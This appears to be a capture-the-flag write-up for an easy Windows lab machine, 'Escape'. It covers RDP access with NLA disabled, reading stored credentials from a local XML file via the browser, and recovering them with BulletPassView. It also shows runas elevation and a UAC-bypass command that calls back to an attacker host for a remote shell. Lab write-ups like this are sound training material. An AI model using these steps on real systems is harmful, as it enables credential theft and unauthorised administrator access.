Machine (Easy) - Escape
Writeup for the Escape machine, an easy Windows challenge involving RDP password discovery and privilege escalation.
Writeup Author: BobBuilder
Objective: Gain initial access through a leaked RDP password stored in a local XML file, then escalate to Administrator using runas
or bypassed UAC.
Category | Difficulty | Platform | Machine Author |
---|---|---|---|
Machine | Easy | Windows | xct & kozie |
User
Remote Access (LSA Disabled)
We connect to the target using RDP with Network Level Authentication disabled:
xfreerdp /v:<escape_ip> -sec-nla
This opens a remote desktop session without requiring initial credentials.
Credential Discovery via Local File Access
From the RDP session, open Microsoft Edge and browse to:
file:///C:/_admin/profiles.xml
The XML file reveals stored RDP credentials:
<Profile>
<ProfileName>admin</ProfileName>
<UserName>127.0.0.1</UserName>
<Password><REDACTED></Password>
<Secure>False</Secure>
</Profile>
Decrypting the Password
Using BulletPassView
from NirSoft, we reveal the plaintext password stored in the XML file's associated GUI:
admin : <REDACTED>
This gives us valid credentials for local admin login.
Root
Privilege Escalation via runas
Standard runas
:
runas /user:admin cmd
or
runas /user:Escape\admin cmd
Elevated prompt via PowerShell
Start-Process cmd.exe -verb runas
UAC bypass + callback using custom tool
To drop us into an Administrator shell
.\runas.exe user pass -r <attacker_ip>:<port> cmd --bypass-uac